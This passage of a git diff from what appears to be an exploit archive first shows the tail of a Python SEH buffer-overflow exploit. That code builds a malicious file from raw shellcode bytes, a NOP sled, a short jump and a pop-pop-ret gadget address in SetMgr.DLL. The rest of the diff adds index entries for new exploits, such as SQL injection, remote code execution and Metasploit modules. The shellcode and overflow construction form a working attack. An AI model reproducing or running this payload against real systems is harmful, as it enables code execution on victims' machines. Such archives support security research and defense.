+"\x09\xc6\xda\xab\x22\xf2\x57\x4a\xe4\x72\x23\x69\x20\xde\xf7" +"\x10\x71\xba\x56\x2c\x61\x65\x06\x88\xea\x88\x53\xa1\xb1\xc4" +"\x90\x88\x49\x15\xbf\x9b\x3a\x27\x60\x30\xd4\x0b\xe9\x9e\x23" +"\x6b\xc0\x67\xbb\x92\xeb\x97\x92\x50\xbf\xc7\x8c\x71\xc0\x83" +"\x4c\x7d\x15\x03\x1c\xd1\xc6\xe4\xcc\x91\xb6\x8c\x06\x1e\xe8" +"\xad\x29\xf4\x81\x44\xd0\x9f\x6d\x30\xda\x48\x06\x43\xda\x71" +"\xa5\xca\x3c\x17\x59\x9b\x97\x80\xc0\x86\x63\x30\x0c\x1d\x0e" +"\x72\x86\x92\xef\x3d\x6f\xde\xe3\xaa\x9f\x95\x59\x7c\x9f\x03" +"\xf5\xe2\x32\xc8\x05\x6c\x2f\x47\x52\x39\x81\x9e\x36\xd7\xb8" +"\x08\x24\x2a\x5c\x72\xec\xf1\x9d\x7d\xed\x74\x99\x59\xfd\x40" +"\x22\xe6\xa9\x1c\x75\xb0\x07\xdb\x2f\x72\xf1\xb5\x9c\xdc\x95" +"\x40\xef\xde\xe3\x4c\x3a\xa9\x0b\xfc\x93\xec\x34\x31\x74\xf9" +"\x4d\x2f\xe4\x06\x84\xeb\x04\xe5\x0c\x06\xad\xb0\xc5\xab\xb0" +"\x42\x30\xef\xcc\xc0\xb0\x90\x2a\xd8\xb1\x95\x77\x5e\x2a\xe4" +"\xe8\x0b\x4c\x5b\x08\x1e") + +evil="\x90"*20 + shellcode + +# Bad chars : "\x00\x0a\x0d\x1a" +# 0x03912524 [SetMgr.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False | pop edi # pop esi # ret + +b = "A"*4108 + "\xEB\x06\x90\x90" + "\x24\x25\x91\x03" + evil+ "B" * (1384-len(evil)) + +textfile = open (filename, 'w') + +textfile.write(b) + +textfile.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 045a0429b..c5fd75fc0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6155,8 +6155,9 @@ id,file,description,date,author,type,platform,port 45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple, 45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple, 45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios, -45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows, +45679,exploits/windows_x86-64/dos/45679.py,"BORGChat 1.0.0 build 438 - Denial of Service (PoC)",2018-10-25,"Ihsan Sencan",dos,windows_x86-64, 45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86, +45694,exploits/linux/dos/45694.c,"libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer",2018-10-25,"Google Security Research",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10050,6 +10051,8 @@ id,file,description,date,author,type,platform,port 45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, 45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows, 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows, +45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86, +45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16890,7 +16893,9 @@ id,file,description,date,author,type,platform,port 45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows, 45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware, 45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux, -45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux, +45658,exploits/windows/remote/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write",2018-10-23,hyp3rlinx,remote,windows, +45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25 +45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40026,6 +40031,7 @@ id,file,description,date,author,type,platform,port 45270,exploits/hardware/webapps/45270.txt,"Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection",2018-08-27,"Yorick Koster",webapps,hardware, 45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80 45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80 +45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php, 45284,exploits/php/webapps/45284.txt,"phpMyAdmin 4.7.x - Cross-Site Request Forgery",2018-08-29,VulnSpy,webapps,php,80 45286,exploits/hardware/webapps/45286.py,"Episerver 7 patch 4 - XML External Entity Injection",2018-08-29,"Jonas Lejon",webapps,hardware, 45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86,8080 @@ -40191,3 +40197,15 @@ id,file,description,date,author,type,platform,port 45676,exploits/hardware/webapps/45676.md,"D-Link Routers - Command Injection",2018-10-12,"Blazej Adamczyk",webapps,hardware, 45677,exploits/hardware/webapps/45677.md,"D-Link Routers - Plaintext Password",2018-10-12,"Blazej Adamczyk",webapps,hardware, 45678,exploits/hardware/webapps/45678.md,"D-Link Routers - Directory Traversal",2018-10-12,"Blazej Adamczyk",webapps,hardware, +45681,exploits/php/webapps/45681.txt,"Ekushey Project Manager CRM 3.1 - Cross-Site Scripting",2018-10-25,"Ismail Tasdelen",webapps,php,80 +45682,exploits/php/webapps/45682.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL injection",2018-10-25,"Boumediene KADDOUR",webapps,php,80 +45683,exploits/php/webapps/45683.txt,"phptpoint Hospital Management System 1.0 - 'user' SQL injection",2018-10-25,"Boumediene KADDOUR",webapps,php,80 +45684,exploits/php/webapps/45684.txt,"Simple Chat System 1.0 - 'id' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80 +45685,exploits/php/webapps/45685.txt,"Delta Sql 1.8.2 - Arbitrary File Upload",2018-10-25,"Ihsan Sencan",webapps,php, +45686,exploits/php/webapps/45686.txt,"User Management 1.1 - Cross-Site Scripting",2018-10-25,"Ismail Tasdelen",webapps,php,80 +45688,exploits/php/webapps/45688.txt,"ClipBucket 2.8 - 'id' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80 +45689,exploits/php/webapps/45689.txt,"Simple POS and Inventory 1.0 - 'cat' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80 +45690,exploits/php/webapps/45690.txt,"AiOPMSD Final 1.0.0 - 'q' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80 +45691,exploits/php/webapps/45691.txt,"AjentiCP 1.2.23.13 - Cross-Site Scripting",2018-10-25,"Numan OZDEMIR",webapps,php, +45692,exploits/php/webapps/45692.txt,"MPS Box 0.1.8.0 - 'uuid' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80 +45693,exploits/php/webapps/45693.txt,"Open STA Manager 2.3 - Arbitrary File Download",2018-10-25,"Ihsan Sencan",webapps,php,